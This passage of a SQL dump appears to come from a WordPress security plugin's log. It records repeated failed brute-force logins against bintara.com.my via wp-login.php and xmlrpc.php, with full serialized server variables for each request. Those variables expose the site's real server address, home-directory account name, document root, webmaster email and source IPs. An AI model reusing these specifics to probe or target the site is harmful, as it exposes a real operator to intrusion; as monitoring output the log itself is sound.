07:58:30',17738888,19229456,'https://bintara.com.my/wp-login.php',1,0,'94.23.32.126'),(23838,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.32.126\";s:11:\"REMOTE_PORT\";s:5:\"58040\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3vKeoTLkHKFi2qF7EZkAAAAA0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568534313.3052\";s:12:\"REQUEST_TIME\";s:10:\"1568534313\";}}','notice','2019-09-15 07:58:34','2019-09-15 07:58:33',18257768,19556176,'https://bintara.com.my/xmlrpc.php',1,0,'94.23.32.126'),(23839,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.141.196\";s:11:\"REMOTE_PORT\";s:5:\"58024\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX30fb1rBLb0GV3O7mSsIgAAAFI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568535677.7943\";s:12:\"REQUEST_TIME\";s:10:\"1568535677\";}}','notice','2019-09-15 08:21:19','2019-09-15 08:21:18',17740536,19232008,'https://bintara.com.my/wp-login.php',1,0,'139.59.141.196'),(23840,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.141.196\";s:11:\"REMOTE_PORT\";s:5:\"58556\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX30gOesTgPVjZVPWmsLtAAAAMA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568535680.9178\";s:12:\"REQUEST_TIME\";s:10:\"1568535680\";}}','notice','2019-09-15 08:21:22','2019-09-15 08:21:21',18256776,19555192,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.141.196'),(23841,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.191.173.134\";s:11:\"REMOTE_PORT\";s:5:\"39974\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX33N6PPIU0WjPk-sOuQLQAAAZA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568536376.0451\";s:12:\"REQUEST_TIME\";s:10:\"1568536376\";}}','notice','2019-09-15 08:32:58','2019-09-15 08:32:56',17739752,19231240,'https://bintara.com.my/wp-login.php',1,0,'91.191.173.134'),(23842,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.191.173.134\";s:11:\"REMOTE_PORT\";s:5:\"40746\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX33QOesTgPVjZVPWmsMJwAAANE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568536385.0934\";s:12:\"REQUEST_TIME\";s:10:\"1568536385\";}}','notice','2019-09-15 08:33:08','2019-09-15 08:33:05',18257720,19553928,'https://bintara.com.my/xmlrpc.php',1,0,'91.191.173.134'),(23843,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.111.24.122\";s:11:\"REMOTE_PORT\";s:5:\"45600\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX38XOoTLkHKFi2qF7EcqwAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568537692.9556\";s:12:\"REQUEST_TIME\";s:10:\"1568537692\";}}','notice','2019-09-15 08:54:54','2019-09-15 08:54:53',17740320,19231248,'https://bintara.com.my/wp-login.php',1,0,'89.111.24.122'),(23844,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.111.24.122\";s:11:\"REMOTE_PORT\";s:5:\"46010\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX38YKPPIU0WjPk-sOuS5wAAAZU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568537696.1403\";s:12:\"REQUEST_TIME\";s:10:\"1568537696\";}}','notice','2019-09-15 08:54:57','2019-09-15 08:54:56',18256824,19555632,'https://bintara.com.my/xmlrpc.php',1,0,'89.111.24.122'),(23845,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"46484\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3@-uoTLkHKFi2qF7EdRAAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568538367.0766\";s:12:\"REQUEST_TIME\";s:10:\"1568538367\";}}','notice','2019-09-15 09:06:08','2019-09-15 09:06:07',17740696,19231496,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(23846,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"46862\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3-AmCCaIOMm5l5jJEVFgAAAQM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568538370.2157\";s:12:\"REQUEST_TIME\";s:10:\"1568538370\";}}','notice','2019-09-15 09:06:11','2019-09-15 